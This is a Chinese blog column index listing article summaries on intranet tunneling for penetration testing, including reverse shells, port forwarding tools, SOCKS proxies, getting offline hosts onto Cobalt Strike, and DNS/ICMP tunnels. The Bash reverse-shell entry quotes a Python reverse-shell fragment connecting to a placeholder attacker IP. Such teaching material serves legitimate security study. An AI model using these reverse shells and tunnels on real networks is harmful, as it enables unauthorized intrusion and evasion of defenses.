内网隧道代理技术
关注
分享
扫一扫
文章平均质量分 84
在渗透测试中,常需通过边界主机进入内网,利用其作为跳板进行横向渗透。内网环境复杂,部署众多安全设备,限制访问。因此,使用代理如TCP、HTTP、DNS、SOCKS、ICMP隧道,以及端口转发、映射和多级代理等技术,突破限制,至关重要。学习这些内网隧道技术对提升渗透效率和安全性至关重要。
忆南呦
我不认为我是聪明人,和大多数人一样需要量变积累质变。
天赋+勤奋能让人成为像爱因斯坦那样的人,而只有勤奋+坚持的话也不错,至少可以做成自己想做的事情。
展开
-
内网隧道代理技术-概述
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命 令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端 与服务端的角色反转。原创 2024-09-15 19:53:21 · 424 阅读 · 0 评论 -
LCX端口转发
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。原创 2024-10-22 17:27:18 · 1163 阅读 · 0 评论 -
使用SSH端口转发
SSH通过网络远程访问主机提供保护,可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP、和端口转发的功能。原创 2024-10-22 18:10:01 · 1090 阅读 · 0 评论 -
NETSH端口转发
netsh是windows系统自带命令行程序,攻击者无需上传第三方工具即可利用netsh程序可进行端口转 发操作,可将内网中其他服务器的端口转发至本地访问运行这个工具需要管理员的权限。原创 2024-10-22 18:14:07 · 673 阅读 · 0 评论 -
NetCat反弹shell
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通过NC可以进行端口扫描、 反弹Shell、端口监听和文件传输等操作原创 2024-11-04 16:19:09 · 626 阅读 · 0 评论 -
PowerCat反弹Shell
PowerCat是一个powershell写的tcp/ip瑞士军刀,可以看成ncat的powershell的实现,然后里面也 加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。原创 2024-11-04 17:56:06 · 749 阅读 · 0 评论 -
Bash反弹shell
机器名称机器IP攻击机器实验靶机Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,作为一门叫做ABC语 言的替代品。Python提供了高效的高级数据结构,还能简单有效地面向对象编程。Python语法和动 态类型,以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用的编程语言,随着版本 的不断更新和语言新功能的添加,逐渐被用于独立的、大型项目的开发。python反弹shell介绍python2s.connect(("攻击机器IP",端口));机器名称。原创 2024-11-04 19:30:42 · 1174 阅读 · 0 评论 -
应用层代理技术
应用层代理是我们最常用的代理,平时在进行内网渗透,或者扫描的时候经常需要这个代理,根据协议 不同大体有以下的分类1、http代理2、socks代理3、SSH代理4、DNS代理5、还有自定义的一些协议和加密规则(强烈谴责,正经人谁用这些,都是目的不纯)这个技术我们不讨论每种代理应用的场景不同,在不同的场景需要选择不同的代理,接下来我们看一下需要代理的场景平时在做渗透测试中我们需要对公网的资产进行扫描和探测,但是又害怕对方封掉你的IP地址,我们需要挂代理在这种情况我我们需要哪些东西走代理呢?原创 2024-11-04 20:42:27 · 961 阅读 · 0 评论 -
应用层内网代理
内网资产扫描这种场景一般是进行内网渗透才需要的代理技术,如果你不打内网一般是不需要这种技术 的,内网代理技术一般也是采用http或者socks代理针对以上的情况我们需要如何对内网进行扫描呢?1、直接使用web服务进行扫描(这种方式请看内网渗透)2、做代理让web服务成为代理机器针对于内网的机器要考虑是用代理隧道还是使用端口转发在这种情况需要用什么工具走代理呢?1、扫描工具2、浏览器3、burp使用代理一般是用http代理或者socks代理代理后的拓扑如下。原创 2024-11-05 12:31:02 · 265 阅读 · 0 评论 -
Earthworm使用
Earthworm简称EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功 能,可在复杂网络环境下完成网络穿透该工具已经停止维护和下载:http://rootkiter.com/EarthWorm/该工具支持端口转发,正向代理,反向代理,多级代理等方式,可以打通一条网络隧道,直达网络深 处,用蚯蚓独有的手段突破网络限制接下来我们学习一下下载地址;原创 2024-11-05 13:28:11 · 1142 阅读 · 0 评论 -
FRP NPS介绍和使用
配置文件非常重要,需要什么功能就可以进行不同的配置,来进行代理 参考文档:https://gofrp.org/docs/reference/server-configures/服务端:基础配置nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任 何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等 等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。原创 2024-11-05 13:52:00 · 1071 阅读 · 0 评论 -
上线不出网机器
如果说当我们拿到一台电脑(一般是WEB机器)但是不出网。只有http端口可以连接,只有webshell的情况下,我们该如何上线到CS呢?这个时候就要借助80端口,然后开启socks隧道,从而进行上线。原创 2024-11-05 14:09:52 · 1005 阅读 · 0 评论 -
DNS和ICMP隧道
域名系统(Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映 射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。当前,对于每一 级域名长度的限制是63个字符,域名总长度则不能超过253个字符。DNS协议是用来将域名转换为IP地 址,DNS除了提供主机名到IP地址转换外,还提供如下服务:主机别名、邮件服务器别名、负载分配等。原创 2024-11-05 16:30:32 · 827 阅读 · 0 评论